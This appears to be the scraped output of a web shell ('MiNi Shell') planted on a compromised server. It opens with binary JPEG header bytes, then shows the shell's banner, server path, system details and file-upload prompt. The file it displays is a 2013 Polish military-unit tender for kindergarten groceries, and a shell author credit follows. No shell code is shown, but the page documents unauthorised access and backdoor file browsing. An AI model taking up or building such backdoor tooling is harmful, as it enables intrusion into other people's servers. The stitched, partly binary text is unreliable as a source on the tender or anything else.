JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/479736-N-2013.html

<p class="kh_header"><b>Zgierz: Artykuły ogólnospożywcze dla Przedszkola Nr 129 w Nowym Glinniku i Przedszkola Nr 147 w Leźnicy Wielkiej</b><br>
<b>Numer ogłoszenia: 479736 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 2573 , ul. Konstantynowska 85, 95-100 Zgierz, woj. łódzkie, tel. 42 750 20 98, faks 42 750 21 01.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: obrona.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Artykuły ogólnospożywcze dla Przedszkola Nr 129 w Nowym Glinniku i Przedszkola Nr 147 w Leźnicy Wielkiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa niżej wymienionego pieczywa i wyrobów cukierniczych oraz artykułów ogólnospożywczych. Wykonawca musi mieć opracowany, wdrożony i stosowany system analizy zagrożeń HACCP.
Zadanie 1
1)	barszcz biały 50,00 l
2)	ciastka kruche luz 35,00 kg
3)	cukier 335,00 kg
4)	cukier waniliowy 2,5 kg
5)	drożdże świeże spożywcze 1,50 kg
6)	dżem truskawkowy 37,00 kg
7)	groszek konserwowy 12,00 kg
8)	herbatniki 30,00 kg
9)	kasza gryczana 15,00 kg
10)	kasza jęczmienna perłowa mazurska 50,00 kg
11)	kompot owocowy  wiśniowy 510,00 kg
12)	krem czekoladowy typu nutella 27,00 kg
13)	makaron nitka 43,00 kg
14)	makaron kolanka 38,00 kg
15)	makaron świderki 110,00 kg
16)	miód naturalny 12,00 kg
17)	papryka mielona słodka 0,30 kg
18)	pasztet drobiowy 35,00 kg
19)	pieprz naturalny czarny mielony 1,40 kg
20)	proszek do pieczenia 2,50 kg
21)	ryż uniwersalny 55,00 kg
22)	soda oczyszczona 1,00 kg
23)	sól kamienna mielona 110,00 kg
24)	tymianek przyprawa 0,30 kg
25)	zioła prowansalskie 0,30 kg
26)	kapusta kwaszona 150,00 kg
27)	ogórki konserwowe 180,00 kg
28)	papryka konserwowa 10,00 kg
29)	chrzan tarty 1,00 kg
30)	szczaw konserwowy 9,00 kg
31)	przecier ogórkowy 33,00 kg
32)	kukurydza konserwowa 8,00 kg
33)	sok wieloowocowy (op.0,2l)  130,00 l
34)	mąka pszenna 210,00 kg
35)	mąka ziemniaczana 5,00 kg
36)	kasza manna 15,00 kg
37)	płatki kukurydziane 15,00 kg
38)	płatki owsiane 5,00 kg
39)	fasola biała Jaś karłowy 6,00 kg
40)	groch obłuskany połówki 25,00 kg
41)	fasola szparagowa zamrożona 10,00 kg
42)	różyczki kalafiora zamrożone 20,00 kg
43)	kapusta brukselka zamrożona 12,00 kg
44)	czekolada mleczna 15,00 kg
45)	wafel czekoladowy 30,00 kg
46)	kakao 3,00 kg
47)	budyń 12,00 kg
48)	galaretka 12,00 kg
49)	kisiel 13,00 kg
50)	majonez 18,00 kg
51)	musztarda 5,00 kg
52)	ketchup łagodny 11,00 kg
53)	przyprawa do drobiu 0,80 kg
54)	przyprawa uniwersalna 22,00 kg
55)	cynamon 0,25 kg
56)	kwasek cytrynowy 1,50 kg
57)	bazylia 0,30 kg
58)	oregano 0,30 kg
59)	koncentrat pomidorowy 60,00 kg
60)	majeranek 0,50 kg
Zadanie 2
1)	barszcz biały 30,00 l
2)	cukier 300,00 kg
3)	ciastka czekoladowe 18,00 kg
4)	krem czekoladowy  20,00 kg
5)	ciastka kruche luz 25,00 kg
6)	dżem truskawkowy 35,00 kg
7)	syrop malinowy 154,80 kg
8)	kasza gryczana specjalna 15,00 kg 
9)	kasza jęczmienna perłowa mazurska 50,00 kg
10)	ryż uniwersalny 50,00 kg
11)	makaron nitka 60,00 kg
12)	makaron kolanka 40,00 kg
13)	makaron świderki 2,5 kg
14)	makaron spaghetti 15,00 kg
15)	miód naturalny 6,00 kg
16)	pieprz naturalny czarny mielony 2,00 kg
17)	płatki czekoladowe kulki 7,50 kg
18)	płatki miodowe 7,50 kg
19)	papryka mielona słodka 0,50 kg
20)	sól kamienna mielona 65,00 kg
21)	drożdże świeże spożywcze 3,00kg
22)	kapusta kwaszona 120,00 kg
23)	ogórki kwaszone 80,00 kg
24)	chrzan tarty 3,00 kg
25)	kukurydza konserwowa 18,00 kg
26)	sok jabłkowy (op. 0,2l) 20,00l
27)	sok pomarańczowy (op. 0,2l) 20,00l
28)	brzoskwinie w syropie 15,00 kg
29)	mąka pszenna typ 500 210,00 kg
30)	mąka ziemniaczana 5,00 kg
31)	kasza manna 20,00 kg
32)	płatki owsiane 12,00 kg
33)	płatki kukurydziane 7,50 kg
34)	fasola biała jaś karłowy 9,00 kg
35)	groch obłuskany połówki 20,00 kg
36)	truskawka zamrożona 25,00 kg
37)	fasola szparagowa zamrożona 150,00 kg
38)	różyczki kalafiora zamrożone 15,00 kg
39)	kakao 3,00 kg
40)	budyń 5,12 kg
41)	galaretka 6,00 kg
42)	kisiel 6,00 kg
43)	majonez 10,00 kg
44)	musztarda 2,00 kg
45)	ketchup łagodny 7,00 kg
46)	przyprawa do drobiu 0,30 kg
47)	przyprawa uniwersalna 35,00 kg
48)	kwasek cytrynowy 0,5 kg 
49)	cynamon 0,30 kg
50)	bazylia 0,30 kg
51)	oregano 0,30 kg
52)	koncentrat pomidorowy 30,00 kg
53)	liść laurowy 0,50 kg
54)	majeranek 1,00 kg
55)	ziele angielskie 0,50 kg.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.33.11.42-4, 15.33.10.00-7, 15.33.11.00-8, 15.32.16.00-0, 15.32.11.00-5, 15.33.24.00-8, 15.61.21.00-2, 15.31.20.00-8, 15.61.31.00-9, 15.61.33.11-1, 03.21.22.00-2, 15.33.11.70-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli wykonawca wykaże, iż posiada:
a)	Aktualną decyzję Państwowego Powiatowego Inspektora Sanitarnego o zatwierdzeniu zakładu do wprowadzania do obrotu produktów pochodzenia niezwierzęcego.

Podstawa prawna: art. 61 ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia    (Dz.U. z 2006r. Nr 171 poz.1225 z późn. zm.), 

lub

Aktualne zaświadczenie wydane przez Państwową Inspekcje Sanitarną potwierdzające wpisanie do rejestru zatwierdzonych zakładów produkcyjnych lub wprowadzających do obrotu żywność, podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (wzór zawiera załącznik nr 6 do rozporządzenia Ministra Zdrowia z dnia 29 maja 2007 r. w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzenia zakładów produkcyjnych lub wprowadzających do obrotu żywność podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej Dz.U. z 2007 Nr 106 poz. 730).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, iż posiada  doświadczenie zdobyte poprzez należyte wykonanie lub  wykonywanie w okresie ostatnich 3 lat (a jeżeli okres działalności jest krótszy w tym okresie), przed upływem terminu składania ofert co najmniej 1 (jednej) dostawy głównej, odpowiadającą swoim rodzajem dostawie stanowiącej przedmiot zamówienia z podaniem wartości, przedmiotu, dat wykonania i podmiotu na rzecz którego dostawa została wykonana., o wartości nie mniejszej niż:
Zadanie 1: dostawy artykułów ogólnospożywczych o wartości nie mniejszej niż 10 000,00 zł
Zadanie 3 dostawy artykułów ogólnospożywczych o wartości nie mniejszej niż 
5 000,00 zł.
UWAGA:
Jeżeli wykonawca składa ofertę na więcej niż jedno zadanie musi wykazać się doświadczeniem zdobytym poprzez zrealizowanie dostaw jako sumę dla każdego z tych zadań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania odpowiednim potencjałem technicznym za spełniony na podstawie oświadczenia w trybie art. 22 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia za spełniony na podstawie oświadczenia w trybie art. 22 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania odpowiednim potencjałem technicznym za spełniony na podstawie oświadczenia w trybie art. 22 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dokument określający zasady reprezentacji oraz osoby uprawnione do reprezentacji wykonawcy, a jeżeli wykonawcę reprezentuje pełnomocnik - także pełnomocnictwo, określające zakres umocowania, podpisane przez osoby uprawnione do reprezentowania wykonawcy, pełnomocnictwo w przypadku wspólnego ubiegania się wykonawców o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.army.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> bezpłatnie w Jednostce Wojskowej 2573 w Zgierzu ul. Konstantynowska 85 bud. 1 pok. 102 w godz. 7.30 -15.30 lub za pośrednictwem poczty po złożeniu wniosku.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 10:00, miejsce: Jednostka Wojskowa 2573 w Zgierzu ul. Konstantynowska 85 bud. nr 2, I piętro pok. 114 (Kancelaria Jawna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> sposób porozumiewania się faks nr (42) 750-21-01, e-mail: jw257311@wp.mil.pl.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa artykułów ogólnospożywczych dla Przedszkola Nr 129 w Nowym Glinniku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie 1
1)	barszcz biały 50,00 l
2)	ciastka kruche luz 35,00 kg
3)	cukier 335,00 kg
4)	cukier waniliowy 2,5 kg
5)	drożdże świeże spożywcze 1,50 kg
6)	dżem truskawkowy 37,00 kg
7)	groszek konserwowy 12,00 kg
8)	herbatniki 30,00 kg
9)	kasza gryczana 15,00 kg
10)	kasza jęczmienna perłowa mazurska 50,00 kg
11)	kompot owocowy  wiśniowy 510,00 kg
12)	krem czekoladowy typu nutella 27,00 kg
13)	makaron nitka 43,00 kg
14)	makaron kolanka 38,00 kg
15)	makaron świderki 110,00 kg
16)	miód naturalny 12,00 kg
17)	papryka mielona słodka 0,30 kg
18)	pasztet drobiowy 35,00 kg
19)	pieprz naturalny czarny mielony 1,40 kg
20)	proszek do pieczenia 2,50 kg
21)	ryż uniwersalny 55,00 kg
22)	soda oczyszczona 1,00 kg
23)	sól kamienna mielona 110,00 kg
24)	tymianek przyprawa 0,30 kg
25)	zioła prowansalskie 0,30 kg
26)	kapusta kwaszona 150,00 kg
27)	ogórki konserwowe 180,00 kg
28)	papryka konserwowa 10,00 kg
29)	chrzan tarty 1,00 kg
30)	szczaw konserwowy 9,00 kg
31)	przecier ogórkowy 33,00 kg
32)	kukurydza konserwowa 8,00 kg
33)	sok wieloowocowy (op.0,2l)  130,00 l
34)	mąka pszenna 210,00 kg
35)	mąka ziemniaczana 5,00 kg
36)	kasza manna 15,00 kg
37)	płatki kukurydziane 15,00 kg
38)	płatki owsiane 5,00 kg
39)	fasola biała Jaś karłowy 6,00 kg
40)	groch obłuskany połówki 25,00 kg
41)	fasola szparagowa zamrożona 10,00 kg
42)	różyczki kalafiora zamrożone 20,00 kg
43)	kapusta brukselka zamrożona 12,00 kg
44)	czekolada mleczna 15,00 kg
45)	wafel czekoladowy 30,00 kg
46)	kakao 3,00 kg
47)	budyń 12,00 kg
48)	galaretka 12,00 kg
49)	kisiel 13,00 kg
50)	majonez 18,00 kg
51)	musztarda 5,00 kg
52)	ketchup łagodny 11,00 kg
53)	przyprawa do drobiu 0,80 kg
54)	przyprawa uniwersalna 22,00 kg
55)	cynamon 0,25 kg
56)	kwasek cytrynowy 1,50 kg
57)	bazylia 0,30 kg
58)	oregano 0,30 kg
59)	koncentrat pomidorowy 60,00 kg
60)	majeranek 0,50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.82.00.00-2, 15.84.00.00-8, 15.85.10.00-8, 15.77.10.00-4, 15.87.20.00-1, 15.89.80.00-9, 15.89.90.00-6, 15.32.10.00-7, 15.33.11.70-9, 15.33.14.00-1, 15.33.00.00-0, 15.61.33.11-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa artykułów ogólnospożywczych dla Przedszkola Nr 147 w Leźnicy Wielkiej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	barszcz biały 30,00 l
2)	cukier 300,00 kg
3)	ciastka czekoladowe 18,00 kg
4)	krem czekoladowy  20,00 kg
5)	ciastka kruche luz 25,00 kg
6)	dżem truskawkowy 35,00 kg
7)	syrop malinowy 154,80 kg
8)	kasza gryczana specjalna 15,00 kg 
9)	kasza jęczmienna perłowa mazurska 50,00 kg
10)	ryż uniwersalny 50,00 kg
11)	makaron nitka 60,00 kg
12)	makaron kolanka 40,00 kg
13)	makaron świderki 2,5 kg
14)	makaron spaghetti 15,00 kg
15)	miód naturalny 6,00 kg
16)	pieprz naturalny czarny mielony 2,00 kg
17)	płatki czekoladowe kulki 7,50 kg
18)	płatki miodowe 7,50 kg
19)	papryka mielona słodka 0,50 kg
20)	sól kamienna mielona 65,00 kg
21)	drożdże świeże spożywcze 3,00kg
22)	kapusta kwaszona 120,00 kg
23)	ogórki kwaszone 80,00 kg
24)	chrzan tarty 3,00 kg
25)	kukurydza konserwowa 18,00 kg
26)	sok jabłkowy (op. 0,2l) 20,00l
27)	sok pomarańczowy (op. 0,2l) 20,00l
28)	brzoskwinie w syropie 15,00 kg
29)	mąka pszenna typ 500 210,00 kg
30)	mąka ziemniaczana 5,00 kg
31)	kasza manna 20,00 kg
32)	płatki owsiane 12,00 kg
33)	płatki kukurydziane 7,50 kg
34)	fasola biała jaś karłowy 9,00 kg
35)	groch obłuskany połówki 20,00 kg
36)	truskawka zamrożona 25,00 kg
37)	fasola szparagowa zamrożona 150,00 kg
38)	różyczki kalafiora zamrożone 15,00 kg
39)	kakao 3,00 kg
40)	budyń 5,12 kg
41)	galaretka 6,00 kg
42)	kisiel 6,00 kg
43)	majonez 10,00 kg
44)	musztarda 2,00 kg
45)	ketchup łagodny 7,00 kg
46)	przyprawa do drobiu 0,30 kg
47)	przyprawa uniwersalna 35,00 kg
48)	kwasek cytrynowy 0,5 kg 
49)	cynamon 0,30 kg
50)	bazylia 0,30 kg
51)	oregano 0,30 kg
52)	koncentrat pomidorowy 30,00 kg
53)	liść laurowy 0,50 kg
54)	majeranek 1,00 kg
55)	ziele angielskie 0,50 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.82.00.00-2, 15.84.00.00-8, 15.85.10.00-8, 15.87.10.00-4, 15.87.20.00-1, 15.89.80.00-9, 15.89.90.00-6, 15.32.10.00-7, 15.33.11.70-9, 15.33.14.00-1, 15.33.00.00-0, 15.61.33.11-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com